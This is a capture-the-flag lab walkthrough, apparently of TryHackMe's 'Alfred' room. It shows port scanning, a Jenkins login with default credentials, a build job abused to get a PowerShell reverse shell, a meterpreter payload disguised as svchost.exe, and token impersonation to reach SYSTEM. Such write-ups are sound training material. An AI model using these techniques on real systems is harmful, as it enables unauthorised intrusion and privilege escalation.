Initial access
What do Batman and Jenkins have in common? Check the page source code for the answer. Running nmap reveals that the following three TCP ports listed below are open. Visiting the website hosted on TCP port 80 displays a picture of the actor Christian Bale. To this day, no one has seen Batman and Christian Bale together in the same room.
1
2
3
4
5
6
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -T4 -Pn -p1-10000 -v <TARGET_IP>
PORT STATE SERVICE
80/tcp open http
3389/tcp open ms-wbt-server
8080/tcp open http-proxy
Continueing to the Jenkins server on port 8080/tcp we are greeted with a login wall. A quick Google search shows that the default username for Jenkins is admin and the password is stored in $JENKINS_HOME/secrets/initialAdminPassword. However, this is not an option since we do not have access to the filesystem yet. Before attempting a fully fledged and noisy brute force atack, why not check if the door is already half open? Seems like it is!
After log in we can see a project with the name “project” (confusing) was last built succesfullly almost 3 years ago. Checking the console output we see a shell executing a command:
1
2
3
4
5
6
7
8
9
10
Started by user admin
Running as SYSTEM
Building in workspace C:\Program Files (x86)\Jenkins\workspace\project
[project] $ cmd /c call C:\Users\bruce\AppData\Local\Temp\jenkins8034204804437582227.bat
C:\Program Files (x86)\Jenkins\workspace\project>whoami
alfred\bruce
C:\Program Files (x86)\Jenkins\workspace\project>exit 0
Finished: SUCCESS
We can replace the whoami command with the powershell command provided by THM and adjust it to match your attack machine webserver and netcat listener. After running a new job for the project we obtained a shell!
1
2
3
4
5
6
7
└─$ nc -lvnp 4242
listening on [any] 4242 ...
connect to [10.11.75.80] from (UNKNOWN) [10.10.32.229] 49312
Windows PowerShell running as user bruce on ALFRED
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\Program Files (x86)\Jenkins\workspace\test>
The first flag is located at C:\Users\bruce\Desktop\user.txt
Switching shells
The current shell works, but a meterpreter shell has much more capabilities. THM already provides the commands to create a meterpreter payload, but we are allowed to choose a name for the executable. Its a good practice to use a common executable name to seem less suspicious. After downloading the payload using the reverse shell we already have we can run the executable: C:\Program Files (x86)\Jenkins\workspace\test> ./svchost.exe
Because running svchost.exe from the Jenkins folder is obviously not suspicious..
Privilege escalation
Running whoami /priv shows we have the “SecurityImpersonation” Impersonation token level enabled. By using meterpreter we are able to assign the NT Authority\System user impersonation token:
1
2
3
4
5
6
7
8
9
meterpreter > getuid
Server username: alfred\bruce
meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Meterpreter warns us that we are not running as the system user. Windows checks the primary token of a process, not the impersonation token to determine privileges. We therefore need to migrate to a process running under the system user such as services.exe.
After migrating we are able to grab the root flag!